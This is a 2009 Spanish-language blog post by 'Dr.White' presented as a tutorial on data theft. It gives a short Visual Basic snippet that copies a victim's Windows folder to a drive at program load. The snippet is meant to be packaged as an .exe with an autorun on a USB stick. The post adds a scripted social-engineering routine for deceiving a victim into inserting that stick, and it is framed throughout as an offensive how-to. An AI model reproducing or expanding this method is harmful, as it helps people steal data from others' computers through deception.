Backup Oficial de SeguridadBlanca.Org

jueves, 5 de noviembre de 2009

Robo de Datos Muy Simple con Visual Basic

En mis épocas de inmadures en la red tenia ideas de crear w0rms que sirvan para robar conversaciones del msn segun mis victimas infectadas y pues me gustaría compartir el código y funciones de como lo hice y que codigo use yo para que vean que la imaginación no tiene limites y ustedes pueden hacer con imaginación lo que sea...


Como Recordarán hace un tiempo puse una entrada sobre como hacer para infectar con autorun Ahora podremos poner en práctica esos conocimientos pero no necesariamente para infectar como explique en ese mismo tutorial tambien se puede hacer para robo de datos y es lo que haremos ahora...


Primero vamos a ir a visual basic y vamos a crear un nuevo proyecto ahora vamos a llamar el complemento Microsoft Scripting Runtime se escucha profesional no? pues no tanto con esto no haremos mucho mas bien usaremos el FilySystemObject que desde ahora también le podremos decir FSO...

Bueno como ahora hemos empezado con la programación primero les daré el code que pondremos en el form_load()

Dim fso As New FileSystemObject
fso.CopyFolder "c:\windows", "d:\robado", True



Nuestro Code es Básico y Fácil ahora viene la parte difícil, ustedes dirán... como hacemos ahora?

Primero deben aprender que siempre tienen que probar primero lo que sea con ustedes mismos esto es como ser mago, primero tienes que probar los trucos frente al espejo...


Ahora necesitaremos un poco de ingeniería social le diremos que en el pendrive tenemos algo que le queremos mostrar, tendremos dos por si la situación se pone media difícil, ahora meteremos el que tiene el programa malicioso y usaremos la frase magnifica... "Sierto... lo deje en mi casa"... y luego de dos minutos le diremos al usuario estafado creo que lo tengo en mi otro pendrive y lo metemos y no habrá nada entonces diremos "chu...no... si se me olvido pero mañana lo traigo"... como ven no es tan difícil engañar a tu víctima...

Para los que no lo deducieron en el primer pendrive tenemos que tener nuestro programa .exe con el anterior codigo y un autorun que podemos ver en el tutorial que hicimos y que esta mencionado en el principio del segundo parrafo.


Espero les haya gustado este mini artículo de convinar el robo de datos de las pcs con ingeniería social física...


Un Saludo
Dr.White

No hay comentarios:

Publicar un comentario